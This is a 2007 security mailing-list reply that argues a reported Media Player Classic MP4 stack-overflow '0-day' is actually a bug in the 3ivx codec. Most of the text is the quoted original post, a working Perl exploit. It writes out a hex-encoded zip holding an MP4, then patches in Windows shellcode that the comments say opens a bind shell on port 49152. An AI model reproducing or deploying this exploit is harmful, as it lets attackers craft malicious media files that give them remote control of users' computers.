Re: Media Player Classic 6.4.9 MP4 Stack Overflow 0-day
Just to rehash this for my own clarity, and perhaps that of others, this is=
not a defect in Media Player Classic so much as a defect in the 3ivx=
codec. If one were to use a different codec to decode MP4 content this=
defect would not exist.
This is similar to a defect in Adobe Acrobat Reader browser plugin being=
mislabeled as a defect in, oh say, Firefox with respect to .pdf files.=
While I may use Media Player Classic to view MP4 content, I don't have the=
3ivx codec installed (I use a different codec) and therefore am not at=
risk from this defect.
I've seen little coverage of this in the press, and of that little I've=
seen confusion on where the defect exists. Since as far as I know, Media=
Player Classic does not ship with the 3ivx codec there is no out of the=
box risk.
----------
---Matthew
*********** REPLY SEPARATOR ***********
On 12/8/2007 at 1:54 AM gforce@operamail.com wrote:
>#!/bin/perl
>#
># Media Player Classic 6.4.9 MP4 Stack Overflow
>#
># 0-day discovered and exploited by SYS 49152
>#
># Tested on win XP SP2 ENG
># Shell on port 49152
>#
># usage:
># - download this codec in order to manage MP4 content:
># http://www.3ivx.com/coral/3ivx_d4_451_win.exe
>#
># - open the MP4 file with mplayerc.exe
>#
># SYS 49152
># gforce(put the @ here)operamail(put the . here)com
>#
># update:
># the latest 5.0.1 codec is still vulnerable
>
>use Archive::Zip qw( :ERROR_CODES :CONSTANTS );
>
>$zip_data =3D # code 724981
>"\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\xB3\xB1\x30\x36\xF3".
>"\x13\xD9\x53\x73\x02\x00\x00\x57\x04\x00\x00\x19\x00\x00\x00".
>"\x53\x59\x53\x5F\x34\x39\x31\x35\x32\x5F\x4D\x50\x34\x5F\x66".
>"\x6F\x72\x5F\x4D\x50\x43\x2E\x6D\x70\x34\x63\x60\x60\xBF\x9C".
>"\x9B\x9F\x5F\xC6\xC0\xC0\x90\x93\x5B\x96\x91\x02\xA4\x19\x0E".
>"\xBC\xF1\x2B\x3B\xF0\x26\x2C\x99\x81\x81\xF9\x05\x88\xCF\xC0".
>"\x08\x46\x08\x80\xC2\xC1\xE4\x3B\x30\xE0\x05\x40\xD5\xEC\xF1".
>"\xA5\x29\x25\x89\x40\x3A\x3C\x37\x15\x44\x83\x81\x62\x46\x4A".
>"\x4E\x11\x4C\x51\x6E\x4A\x66\x51\x62\x41\x41\x0E\x92\x3E\x76".
>"\xAD\xCC\x9C\xE2\x12\x20\x43\x62\x65\x5E\x62\x2E\x90\x16\x48".
>"\x49\x04\x6B\x86\x59\x2F\xB1\xB2\xBC\xA8\x04\xAB\xB8\x63\x50".
>"\x08\x56\xF1\xC4\x9C\x24\x4C\x71\x36\xF3\x95\xC9\xB9\x40\x73".
>"\x98\x6F\x21\x8B\x4F\x40\x02\xAC\x4C\x8C\xBE\xBA\x8C\x8C\xBE".
>"\x0E\xBE\x0D\x37\x80\x04\x90\x62\x85\x50\x8C\x10\xCA\x01\x42".
>"\x75\x41\xA8\x06\x08\x55\x0A\xA1\x58\x20\x14\x37\x84\xFA\xE4".
>"\xFB\x9A\x0C\xD0\x9D\x16\xEE\xE0\xCC\xF1\xB3\xA4\xE3\xF5\x84".
>"\x41\x03\x5E\xBF\x16\xCD\x99\xE0\x3A\xD1\x97\x95\x05\x12\x36".
>"\x01\xBE\x87\x83\x23\x83\x4D\x2C\x0D\x4D\x8D\x14\x82\x42\x7D".
>"\x5C\xA3\x14\x8D\x4F\x36\xBF\xDC\x70\xF3\xDD\xCD\x12\x95\x2F".
>"\xD1\x8D\xC5\xC2\x2B\x5C\xBF\xEE\x68\x7E\xFD\xE7\xD1\x97\x10".
>"\x7D\xB9\xAF\x0E\x7B\xB8\xDC\xC3\x55\xEB\xAE\xF4\x24\xD6\xFD".
>"\x9D\x72\xAE\x73\xEF\x05\x17\x29\xE3\xE7\xB1\x75\xCF\x3B\x5C".
>"\xE4\x3E\x2A\x17\xD6\xED\x74\x2B\x31\x55\x64\x39\x68\x7A\x66".
>"\x7D\x8B\xFD\xD6\x95\xED\x72\x3E\x93\x05\x2F\x4E\xB8\xBB\xA0".
>"\xEE\x79\x8F\x8B\xDC\x3D\x65\xCF\x7D\xC6\xDF\x23\xBF\x04\xAF".
>"\xCE\xAC\x33\x3C\x92\xF8\xF2\x66\x76\x89\xDE\x1D\x65\xB6\xA3".
>"\xC6\x2F\x3C\xEB\x4E\x6C\x79\x51\xF7\x63\x81\xF4\x5C\xB3\x67".
>"\xDE\x92\x2F\xC2\x27\x4F\x7E\x7D\x4E\xF7\x58\xD7\x01\xA3\xB6".
>"\xAE\xEF\x82\x5C\x19\x07\xFA\x24\x5C\x26\x8B\x72\xE5\x7D\x3F".
>"\x23\x70\x4F\x73\xC5\xDF\x5D\x7F\xF5\xBF\xBB\x57\xE8\xEA\x6C".
>"\x8C\x7D\xB1\xC8\xBD\x4E\x6C\xD9\xEB\xDF\x62\xDB\x5E\xBF\x16".
>"\xE3\xCA\x38\xA7\x6B\xBA\xE3\x9C\x58\x4D\xA4\xAD\x6E\xE0\xA2".
>"\x1B\x4D\x40\x39\xFD\xA7\x2F\xFF\xEE\x52\xBD\xC0\xF3\xE2\x76".
>"\xE0\xFF\x5D\xCA\xAF\x41\x6C\x5F\x9E\xE2\x8F\x40\xF6\x8B\x3F".
>"\x82\x0B\xDC\x2B\xAE\xCD\x8D\xBF\xD8\xDC\xF3\x3E\x7C\x32\x90".
>"\xAD\x3C\xFF\xCE\x39\xDD\x69\x57\x15\x17\xCC\x7F\xF1\x31\xC7".
>"\xD2\xD0\x5F\x7F\xA3\xA1\x57\x89\xA9\x37\xD3\xEE\xED\x53\xC3".
>"\xD8\x6F\x6A\xAB\xDA\x9F\x15\x66\x7E\x37\xF7\x54\xD8\xB7\xC7".
>"\xEE\x77\x19\xB9\xF2\x3E\x0B\x2D\x7F\xF9\x53\x64\xFE\xCE\x9F".
>"\x22\x0B\x5E\x86\x4F\x9D\x2B\x5A\xE8\x60\xFD\x3A\x7C\xF2\x7C".
>"\xF7\xF0\x22\xAE\x0C\x65\x21\x4E\xEB\x1C\x45\xAE\xBC\x5F\x40".
>"\xFB\xDC\xBB\x45\x6F\xFC\xDE\xA5\xEC\x5E\x01\x0C\xC4\x52\x70".
>"\x52\x4E\x4F\xCD\xC3\x92\xC4\x15\x4A\x8A\xB2\x41\xE2\x12\x50".
>"\x71\x74\xA0\x90\x92\x59\x9C\x8D\x47\x5E\xAA\x24\xB7\x20\x1F".
>"\x48\x0B\x41\xE5\x45\xE1\x32\x92\xC9\x05\x99\xA0\xDC\x29\x88".
>"\x2E\xC3\x91\x0B\x14\x01\x00\x50\x4B\x01\x02\x14\x00\x14\x00".
>"\x00\x00\x08\x00\xB3\xB1\x30\x36\xF3\x13\xD9\x53\x73\x02\x00".
>"\x00\x57\x04\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00".
>"\x20\x00\x00\x00\x00\x00\x00\x00\x53\x59\x53\x5F\x34\x39\x31".
>"\x35\x32\x5F\x4D\x50\x34\x5F\x66\x6F\x72\x5F\x4D\x50\x43\x2E".
>"\x6D\x70\x34\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
>"\x47\x00\x00\x00\xAA\x02\x00\x00\x00\x00";
>
>my $shellcode =3D # code 724981
>"\x33\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13".
>"\xA8\x45\xF5\xB8\x83\xEB\xFC\xE2\xF4\x54\x2F\x1E\xF5\x40\xBC".
>"\x0A\x47\x57\x25\x7E\xD4\x8C\x61\x7E\xFD\x94\xCE\x89\xBD\xD0".
>"\x44\x1A\x33\xE7\x5D\x7E\xE7\x88\x44\x1E\xF1\x23\x71\x7E\xB9".
>"\x46\x74\x35\x21\x04\xC1\x35\xCC\xAF\x84\x3F\xB5\xA9\x87\x1E".
>"\x4C\x93\x11\xD1\x90\xDD\xA0\x7E\xE7\x8C\x44\x1E\xDE\x23\x49".
>"\xBE\x33\xF7\x59\xF4\x53\xAB\x69\x7E\x31\xC4\x61\xE9\xD9\x6B".
>"\x74\x2E\xDC\x23\x06\xC5\x33\xE8\x49\x7E\xC8\xB4\xE8\x7E\xF8".
>"\xA0\x1B\x9D\x36\xE6\x4B\x19\xE8\x57\x93\x93\xEB\xCE\x2D\xC6".
>"\x8A\xC0\x32\x86\x8A\xF7\x11\x0A\x68\xC0\x8E\x18\x44\x93\x15".
>"\x0A\x6E\xF7\xCC\x10\xDE\x29\xA8\xFD\xBA\xFD\x2F\xF7\x47\x78".
>"\x2D\x2C\xB1\x5D\xE8\xA2\x47\x7E\x16\xA6\xEB\xFB\x16\xB6\xEB".
>"\xEB\x16\x0A\x68\xCE\x2D\x35\xB8\xCE\x16\x7C\x59\x3D\x2D\x51".
>"\xA2\xD8\x82\xA2\x47\x7E\x2F\xE5\xE9\xFD\xBA\x25\xD0\x0C\xE8".
>"\xDB\x51\xFF\xBA\x23\xEB\xFD\xBA\x25\xD0\x4D\x0C\x73\xF1\xFF".
>"\xBA\x23\xE8\xFC\x11\xA0\x47\x78\xD6\x9D\x5F\xD1\x83\x8C\xEF".
>"\x57\x93\xA0\x47\x78\x23\x9F\xDC\xCE\x2D\x96\xD5\x21\xA0\x9F".
>"\xE8\xF1\x6C\x39\x31\x4F\x2F\xB1\x31\x4A\x74\x35\x4B\x02\xBB".
>"\xB7\x95\x56\x07\xD9\x2B\x25\x3F\xCD\x13\x03\xEE\x9D\xCA\x56".
>"\xF6\xE3\x47\xDD\x01\x0A\x6E\xF3\x12\xA7\xE9\xF9\x14\x9F\xB9".
>"\xF9\x14\xA0\xE9\x57\x95\x9D\x15\x71\x40\x3B\xEB\x57\x93\x9F".
>"\x47\x57\x72\x0A\x68\x23\x12\x09\x3B\x6C\x21\x0A\x6E\xFA\xBA".
>"\x25\xD0\x47\x8B\x15\xD8\xFB\xBA\x23\x47\x78\x45\xF5\xB8";
>
>open(code, ">tempzip.zip") || die "Can't Write temporary File\n";
>binmode (code);
>print code $zip_data;
>close (code);
>print "\nTemporary file ready, patching..\n";
>my $zip =3D Archive::Zip->new();
>$zip->read( 'tempzip.zip' ) ;
>$zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' );
>open(code, "+<SYS_49152_MP4_for_MPC.mp4") || die "Can't Open temporary
>File\n";
>binmode (code);
>seek code,619,0;
>print code $shellcode;
>close (code);
>print "Shellcode added, have fun!\n";
討論串 (同標題文章)
完整討論串 (本文為第 3 之 3 篇):